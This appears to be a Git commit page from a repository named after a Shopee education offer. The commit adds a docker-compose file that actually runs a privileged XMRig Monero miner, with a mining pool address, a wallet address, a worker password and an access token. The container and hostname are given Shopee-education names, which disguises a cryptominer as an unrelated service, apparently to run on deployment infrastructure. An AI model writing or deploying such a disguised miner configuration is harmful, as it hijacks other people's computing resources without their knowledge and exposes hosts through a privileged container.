shopee_edu_12month
Deploy Xmirg / build (push) Has been cancelled
Deploy Xmirg / deploy (push) Has been cancelled

This commit is contained in:
2026-07-16 09:45:47 +07:00
parent 8edfaa7b4f
commit 77d601d132
+18
View File
@@ -0,0 +1,18 @@
services:
xmrig:
container_name: shoppee_edu_12months
hostname: shoppee.neyako.vip
image: ghcr.io/murf2/xmrig.docker:latest
restart: unless-stopped
privileged: true
environment:
POOL_URL: "xmr.2miners.com:2222"
POOL_USER: "47nJXCrSUPMBgcLGHoGcxifcQLqm6KfNN4C4ktWhNBvehLBRtcuDnQDEzu43WptQd3MW2MpSiD3i2Vnjg44VHKJ5KzLVj26"
POOL_PASS: "worker01"
COIN: "monero"
THREADS: "4"
PRIORITY: "1"
DONATE_LEVEL: "1"
ACCESS_TOKEN: "neyako"
ports:
- "3000:3000"